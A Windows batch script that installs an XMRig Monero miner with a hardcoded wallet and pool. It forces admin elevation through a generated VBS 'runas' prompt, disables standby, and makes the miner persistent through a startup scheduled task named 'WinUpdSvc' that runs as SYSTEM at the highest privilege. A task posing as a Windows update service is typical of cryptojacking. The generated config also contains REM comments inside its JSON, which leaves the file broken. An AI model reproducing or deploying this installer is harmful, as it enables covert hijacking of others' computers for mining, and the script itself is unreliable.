@echo off
REM ====================================================================
REM Ultimate Monero Miner - Safe Edition
REM ====================================================================
setlocal enableextensions enabledelayedexpansion

REM === CONFIGURATION ===
set "SRC=%~dp0miner_src"
set "DEST=C:\xmrig_miner"
set "TASK_NAME=WinUpdSvc"
set "WALLET=49MJ7AMP3xbB4U2V4QVBFDCJyVDnDjouyV5WwSMVqxQo7L2o9FYtTiD2ALwbK2BNnhFw8rxHZUgH23WkDXBgKyLYC61SAon"
set "POOL=gulf.moneroocean.stream:10032"
set "LOG_FILE=%DEST%\miner.log"

REM === One-Time Admin Enforcement ===
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if '%errorlevel%' neq '0' (
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\elevate.vbs"
    echo UAC.ShellExecute "%~f0", "", "", "runas", 1 >> "%temp%\elevate.vbs"
    "%temp%\elevate.vbs"
    del "%temp%\elevate.vbs"
    exit /b
)

echo ===============================
echo Starting Safe Monero Miner
echo ===============================

REM === Skip MSR Driver Installation ===
echo [*] Skipping MSR driver installation to prevent crashes...

REM === System Optimization (Minimal) ===
powercfg /change standby-timeout-ac 0 >nul
powercfg /change standby-timeout-dc 0 >nul

REM === CPU Core Detection ===
set "AFFINITY_MASK="
for /f "tokens=2 delims==" %%A in ('wmic cpu get NumberOfCores /value ^| find "="') do (
    set /a "CORES=%%A-1"
    for /l %%B in (0,1,!CORES!) do set "AFFINITY_MASK=!AFFINITY_MASK!1"
)
if not defined AFFINITY_MASK (
    set "AFFINITY_MASK=15"  REM Fallback for 4 cores (binary 1111 = decimal 15)
)

REM === Install Files ===
if not exist "%DEST%" mkdir "%DEST%"
xcopy /Y /Q "%SRC%\*" "%DEST%\" >nul || (
    echo [!] File copy failed. Ensure %SRC% contains xmrig.exe and you have permissions.
    pause
    exit /b 1
)

REM === Generate Config File ===
(
  echo {
  echo   "autosave": true,
  echo   "cpu": {
  echo     "enabled": true,
  echo     "huge-pages": false,  REM Disabled to prevent crashes
  echo     "hw-aes": true,
  echo     "priority": 2,  REM Lowered priority (normal)
  echo     "memory-pool": true,
  echo     "asm": true,
  echo     "max-threads-hint": 50,  REM Reduced to 50% CPU usage
  echo     "affinity": !AFFINITY_MASK!
  echo   },
  echo   "opencl": false,
  echo   "cuda": false,
  echo   "pools": [
  echo     {
  echo       "url": "%POOL%",
  echo       "user": "%WALLET%",
  echo       "pass": "%COMPUTERNAME%",
  echo       "keepalive": true,
  echo       "tls": false
  echo     }
  echo   ]
  echo }
) > "%DEST%\config.json"

REM === Clean Watchdog ===
(
  echo @echo off
  echo :loop
  echo "%DEST%\xmrig.exe" --config="%DEST%\config.json" --donate-level=0 --log-file="%LOG_FILE%" --print-time=60
  echo timeout /t 10 >nul
  echo tasklist /fi "IMAGENAME eq xmrig.exe" 2^>nul ^| find /i "xmrig.exe" >nul ^|^| goto loop
  echo goto loop
) > "%DEST%\run_watchdog.bat"

REM === Permanent Auto-Start ===
schtasks /create /tn "%TASK_NAME%" ^
  /tr "\"%DEST%\run_watchdog.bat\"" ^
  /sc onstart ^
  /ru SYSTEM ^
  /rl HIGHEST ^
  /f >nul 2>&1 || (
    echo [!] Failed to create scheduled task
    pause
    exit /b 1
)

start "" /min "%DEST%\run_watchdog.bat"

echo [✔] Miner installed (safe mode)
echo CPU Affinity: !AFFINITY_MASK!
echo Logs: %LOG_FILE%
echo Uninstall: schtasks /delete /tn "%TASK_NAME%" /f ^>nul ^&^& rmdir /s /q "%DEST%"
pause